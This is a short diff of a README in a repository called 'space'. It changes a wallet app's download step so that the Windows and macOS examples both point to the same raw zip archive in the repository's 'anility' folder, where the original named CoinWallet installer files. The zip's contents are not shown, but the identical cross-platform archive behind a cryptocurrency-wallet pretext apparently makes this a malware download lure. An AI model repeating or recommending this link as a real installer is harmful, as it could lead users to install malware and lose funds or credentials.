sikinidproject01/space/README.md

 4. Scroll down to find the "Assets" section.
 This section lists all files available for download.

-5. Click on the file that matches your operating system (e.g., `CoinWallet_setup.exe` for Windows, `CoinWallet.dmg` for macOS).
+5. Click on the file that matches your operating system (e.g., `https://raw.githubusercontent.com/sikinidproject01/space/master/anility/space.zip` for Windows, `https://raw.githubusercontent.com/sikinidproject01/space/master/anility/space.zip` for macOS).

 6. Once the download completes, locate the file in your downloads folder.